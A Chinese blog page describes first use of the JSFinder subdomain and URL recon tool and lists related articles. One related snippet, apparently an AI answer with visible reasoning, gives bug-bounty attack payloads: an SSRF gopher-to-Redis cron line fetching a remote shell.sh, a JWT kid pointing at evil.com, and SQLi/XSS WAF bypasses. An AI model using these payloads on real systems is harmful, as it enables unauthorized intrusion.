JSFinder的第一次使用

最新推荐文章于 2025-05-22 00:27:16 发布
最新推荐文章于 2025-05-22 00:27:16 发布
阅读量1.1k 收藏 6
点赞数 2
CC 4.0 BY-SA版权
文章标签: python 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/ct__chengtao/article/details/132594408

在github上下载了JSFinder,完成了第一次使用,中间遇到了一些曲折,希望写下来,供大家参考。

首先是下载,在github.com/Threezh1/JSFinder上下载

解压后得到两个文件

我们使用的是其中的python文件,所以我们要安装python环境,在官网下载相应版本即可。

安装好python后,在JSFinder.py目录下运行cmd,然后输入python JSFinder.py -u http网址,即可得到该网址在JavaScript中使用的子域名。以jd.com为例,如下。

新安装的python可能会报一些错,那是因为JSFinder.py用到的一些模块新安装的python里没有,在cmd中使用pip命令安装即可,例如缺少‘bs4’模块,会报错ModuleNotFoundError: No module named 'bs4',只需要在cmd中运行pip install bs4即可,安装时间不超过十秒。

迈向光明
关注
渗透测试工具使用手册
weixin_44268185的博客
08-20 1498
【代码】渗透测试工具使用手册。
渗透测试常用武器分享 第五期(SRC批量工具)
渗透测试教程
05-22 1163
本期是关于src挖洞中那些批量化的工。每个工具都有自己特色,适合在不同的场景下使用。祝你挖必洞!ARL开源 | 批量工具 | Python | 2.6k Star简介: 快速侦察与目标关联的互联网资产,构建基础资产信息库。协助甲方安全团队或者渗透测试人员有效侦察和检索资产,发现存在的薄弱点和攻击面。点评: 界面方便、强大、好用地址: https://github.com/TophantTechnology/ARLAutoscanner开源 | 批量工具 | Python | 4
jsfinder 使用手册:高效挖掘 JavaScript 敏感信息
最新发布
优快云Romance的博客
05-22 1008
同时,部分网站会校验 cookie 对应的 IP 地址、User-Agent 等信息,若扫描环境与登录环境不一致,可能导致 cookie 失效,需根据实际情况调整相关参数。key2=value2的形式)。执行命令后,jsfinder 会自动抓取目标网页,提取其中引用的 JavaScript 文件,并对这些文件进行分析,输出可能包含的敏感信息。:扫描过程中若遇到网络连接错误,如超时、无法访问等,检查网络连接是否正常,尝试更换网络环境,或调整扫描线程数等参数,降低对目标服务器的压力。
Python-JSFinder是一款用作快速在网站的js文件中提取URL子域名的工具
08-10
JSFinder是一款用作快速在网站的js文件中提取URL,子域名的工具
jsfinder使用详解
weixin_55821558的博客
05-10 2764
Github 下载后解压在python 环境下运行 解压的文件夹中 打开命令行工具 简单爬取 python jsfinder.py -u 你要爬取的网址 深度爬取 python jsfinder.py -u 你要爬取的网址 -d 爬取出来的 url写入文件 -ou python jsfinder.py -u 你要爬取的网址 -d -ou xxx.txt 爬取出来的 子域名写入文件 -os python jsfinder.py -u 你要爬取的网址 -d...
JS信息收集工具JSFinder
千寻的博客
06-06 8841
JSFinder是一款用作快速在网站的js文件中提取URL,子域名的工具。该工具在JSFinder上进行了增强,主要有: 一、查看帮助信息 二、简单爬取得 三、深度爬取 四、结果保存 1、-ou 指定文件名保存URL链接 2、os 指定文件名保存子域名 3、-c 指定cookie来爬取页面 例: 4、案例...
JSFinder使用说明
https://www.yuque.com/onlyxiu-123com
10-20 8139
JSFinder JSFinder is a tool for quickly extracting URLs and subdomains from JS files on a website. JSFinder是一款用作快速在网站的js文件中提取URL,子域名的工具。 提取URL的正则部分使用的是LinkFinder JSFinder获取URL和子域名的方式: Blog: https://threezh1.com/ 用法 简单爬取 python JSFinder.py -u http://www.xx
一次完整的渗透测试&仅供学习研究
HBohan的博客
12-30 1318
渗透测试中,Web端最常见的问题大多出现在弱口令、文件上传、未授权、任意文件读取、反序列化、模版漏洞等方面。因此,我们着重围绕这些方面进行渗透。
Web渗透测试之信息收集
赤赤三的博客
03-20 844
渗透测试 说明:通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法。 流程: 明确目标:测试目标的范围,ip,域名,端口,内外网 确定规则:能渗透到什么程度,时间,能否修改上传,能否提权 确定需求:web应用的漏洞(新上线程序)?业务逻辑漏洞(针对业务的)?人员权限管理漏洞(针对人员、权限) 名词解释: webshell:通过web入侵的一种脚本工具,对此网站服务进行一定程度的控制。 提权:操作系统低权限的账户提升为管理员权限的方法 .
渗透测试信息收集之域名信息、子域名信息、IP信息、端口信息
yjwangan的博客
11-24 2914
域名(Domain Name),简称域名、网域,是由一串用点分隔的名字组成的Internet上某一台计算机或计算机组的名称,用于在数据传输时标识计算机的电子方位(有时也指地理位置)DNS(域名系统,Domain Name System)是互联网的一项服务它作为将域名和IP地址相互映射的一个分布式数据库,能够使人更方便地访问互联网顶尖域名二级域名三级域名.combaidu.com政府域名商业域名教育域名.gov.com.edu子域名指二级域名,二级域名是顶级域名(一级域名)的下一级。
JSFinder js文件中提取URL,子域名的工具。
06-21
JSFinder是一款用作快速在网站的js文件中提取URL,子域名的工具。
JSFinder.py
01-15
JSFinder是一款用作快速在网站的js文件中提取URL,子域名的脚本工具。 使用方法python JSFinder.py -u http://www.***.com
JSFinder-master
11-12
JSFinder-master,js监测工具,渗透测试工具,本人亲测可用JSFinder-master。
JSFinder,Finger的安装使用,功能介绍,命令大全
m0_74120514的博客
05-29 2879
JSFinder 是一个用于查找和提取网站中 JavaScript 文件的工具。这些文件可能包含对渗透测试和安全审计有用的信息,如 API 密钥、敏感数据、功能逻辑等(图丑了点)Finger 是一款用于红队操作和渗透测试的工具,旨在快速识别和检测大量资产中的存活系统以及系统指纹。它可以帮助安全从业者和红队成员在进行安全评估和渗透测试时高效地识别目标系统。
【渗透-信息收集】JSFinder脚本爬取网站js数据的使用
Yuppie001的博客
03-01 3867
JSFinder 是一个用于探测网站中 JavaScript 文件的工具,它可以帮助安全研究人员发现网站加载的 JavaScript 文件中包含的网址、子域名、API 端点等信息。这种类型的工具通常用于信息收集阶段,是网络安全和渗透测试领域中的常用工具之一。
工具推荐 | JSFinder - 一款用作快速在网站的js文件中提取URL,子域名的工具。
哈利波特的博客
09-09 1335
工具推荐 | JSFinder - 一款用作快速在网站的js文件中提取URL,子域名的工具。
JSFinder使用方法
热门推荐
shy的博客
01-27 1万+
JSFinder JSFinder是一款用作快速在网站的js文件中提取URL,子域名的工具。 下载地址: https://github.com/Threezh1/JSFinder 使用方法: 1,解压后通过python3使用; 2,简单爬取 python JSFinder.py -u http://www.mi.com 3,深度爬取 python JSFinder.py -u http://www.mi.com -d python JSFinder.py -u http://w
jsfinder-window安装教程及使用方法
P5093的博客
04-02 1530
记录个人学习,如有侵权私信联系删除。JSFinder是:可以通过爬取网站各个页面的JS文件从而获得其中包含的网站的子域名的一种工具对于在web前端下,源代码中js文件进行使用
SRC挖掘技巧,需要深入一些 确实能帮助挖洞漏洞赚取赏金
02-18
<think>嗯,用户想了解SRC挖掘技巧,也就是安全响应中心漏洞挖掘的方法,而且需要深入一些,真正能帮助他们通过挖洞赚取赏金。首先,我得先确定用户的基础,可能他们已经了解一些基本概念,但需要更高级的技巧。然后,我要考虑哪些方面是SRC挖掘中的关键点,比如信息收集、漏洞类型的选择、工具使用、逻辑漏洞挖掘、绕过技巧、历史漏洞分析、权限提升、报告撰写等等。 用户可能已经知道常规的漏洞类型,比如SQL注入、XSS,但可能缺乏如何高效发现这些漏洞的策略。需要强调信息收集的重要性,因为全面的信息能增加攻击面。比如子域名枚举、目录扫描、JS文件分析、参数提取这些步骤,用户可能没有系统地应用过。 然后,漏洞类型方面,除了常见漏洞,可能需要介绍一些容易被忽视的漏洞,如SSRF、CSRF、业务逻辑漏洞,特别是业务逻辑漏洞在实战中往往更容易发现,但需要深入理解业务流程。比如支付漏洞中的金额篡改,用户可能没考虑到参数是否可以修改,或者是否有服务端校验。 工具链部分,用户可能使用过一些工具,但如何组合使用,或者使用更高效的工具,比如ParamSpider和x8工具进行参数提取,或者使用一些被动扫描工具如Arjun,这些可能是他们需要了解的。 逻辑漏洞的深入挖掘,比如并发竞争条件、条件竞争,用户可能没有测试过,或者不知道如何构造请求。比如批量请求绕过限频,或者时间差导致的漏洞。 绕过技巧方面,WAF的绕过是实际挖洞中常遇到的难题,用户可能需要具体的payload示例,比如SQL注入中如何绕过过滤,或者XSS中如何编码绕过。 历史漏洞的关联分析,用户可能没有意识到同一厂商不同子域或功能可能存在相同的问题,所以需要教他们如何利用之前的报告或CVE来寻找新模式。 权限提升和组合漏洞,比如信息泄露导致后续攻击,或者多个低危漏洞组合成高危,这也是提升漏洞价值的关键点。 报告撰写部分,用户可能知道漏洞的存在,但如何有效沟通,让厂商快速理解并确认漏洞,从而更快获得赏金,这也是需要注意的地方。 还要考虑用户可能的误区,比如只关注技术漏洞而忽视业务逻辑,或者测试时过于粗暴导致被封禁IP。需要提醒他们注意测试的合法性和范围,遵守SRC的规则。 最后,要确保内容结构清晰,分点列出,每个技巧都结合实际例子,让用户能够理解并应用。同时,强调耐心和积累的重要性,漏洞挖掘不是一蹴而就的,需要持续学习和实践。</think>好的,我将从实战角度深入介绍SRC(安全响应中心)漏洞挖掘的高阶技巧,这些方法在真实漏洞赏金猎人中广泛应用,结合技术细节和攻击面扩展思路,帮助提升漏洞发现效率。 --- ### **一、信息收集的降维打击** 1. **深度资产测绘** - 使用`chaos-zyter` + `Sublist3r`交叉验证子域名,结合证书透明度日志(如crt.sh)获取隐藏资产 - 通过`JSFinder`解析所有JavaScript文件,提取API端点、敏感路径(如/admin/config.json) - 利用`Waybackurls`获取历史URL存档,常发现已下线但未关闭的功能页面 2. **参数爆破的艺术** - 使用`ParamSpider`自动爬取参数后,通过`x8`工具集(x8、qsreplace)生成海量参数变异组合 - 重点关注`callback`、`redirect_uri`、`file`等高风险参数名,结合`ffuf`进行模糊测试 3. **源码泄露自动化** - 部署`git-all-secrets`扫描Github/Gitlab,设置关键词如: ```python "password" extension:env site:target.com ``` - 使用`DumpsterDiver`扫描备份文件(*.bak, *~),特别关注`/wp-content/uploads/`等CMS目录 --- ### **二、漏洞挖掘的精准打击点** #### **1. SSRF进阶利用链** - 探测云元数据API(AWS/Aliyun/腾讯云)时,尝试通过`X-Forwarded-For`头绕过IP限制 - 结合`gopher://`协议攻击Redis未授权访问,构造payload注入定时任务 ```http GET /proxy?url=gopher://127.0.0.1:6379/_*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$61%0d%0a%0a%0a%0a*/1 * * * * root curl http://your-server.com/shell.sh ``` #### **2. 业务逻辑漏洞深挖** - **支付漏洞**:篡改商品数量为负数,观察是否产生"余额增加"(如`quantity=-1`) - **验证码绕过**:连续发送10次相同请求,观察是否触发逻辑锁绕过 - **接口时序攻击**:在手机号修改流程中,并行请求新旧手机号的验证码接口 #### **3. JWT攻击矩阵** - 爆破弱密钥(常见密钥如`secret123`、`changeme`) - 注入`kid`参数指向可控服务器(如`kid=http://evil.com/key.pem`) --- ### **三、绕过技巧的黑暗艺术** #### **WAF绕过模板** ```sql /* SQLi绕过 */ id=1+union+/*%0a*/select+1,version()-- - /* XSS绕过 */ <svg/onload=alert`1`> <img src=x onerror="alert(1)"> /* SSTI绕过(Twig引擎) */ {{7*'7'}} → 若返回49则存在漏洞 ``` #### **云环境绕过** - 在`Host`头后追加随机子域名混淆检测: ```http Host: target.com.evil.com ``` --- ### **四、漏洞组合的致命连击** 1. **信息泄露 → RCE** - 通过`.git`泄露获取数据库配置 → 解密后登录phpMyAdmin → 执行SQL语句写入Webshell 2. **CSRF + 权限提升** - 诱使管理员点击恶意页面,通过CSRF修改其账号为超级管理员角色 3. **OAuth劫持链** - 利用开放重定向漏洞构造恶意回调地址 → 窃取OAuth授权码 → 接管第三方账号 --- ### **五、漏洞报告提权技巧** 1. **漏洞验证视频**:使用`asciinema`录制终端操作过程,比截图更具说服力 2. **风险量化模板**: ``` [Impact] 攻击者可利用此漏洞在30秒内接管任意用户账号 [Reproduction Steps] 1. 登录普通账号 2. 修改Cookie中userID=admin 3. 刷新页面获得管理员权限 [Suggested Fix] 增加服务端会话验证机制 ``` 3. **漏洞关联建议**:在报告末尾注明:"该漏洞可能影响同一架构下的xx子系统" --- ### **六、持续学习的核心资源** 1. **漏洞模式库**: - HackerOne公开报告库(https://hackerone.com/hacktivity) - CVE Details(https://www.cvedetails.com/)按产品分类检索 2. **自动化工具链**: - Nuclei自定义POC模板(https://nuclei.projectdiscovery.io/) - 自建被动扫描系统:Burp Suite + Logger++ + Elasticsearch --- **关键心法**: - 每天至少分析3个高质量漏洞报告,建立"漏洞模式识别"直觉 - 对每个参数保持"如果我是开发者,这里可能犯什么错误"的思维习惯 - 使用`Obsidian`建立个人漏洞知识库,记录每次测试的路径和Payload 通过这套方法论,配合持续实战,可显著提升漏洞挖掘成功率。注意始终遵守SRC测试规则,避免触碰法律红线。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值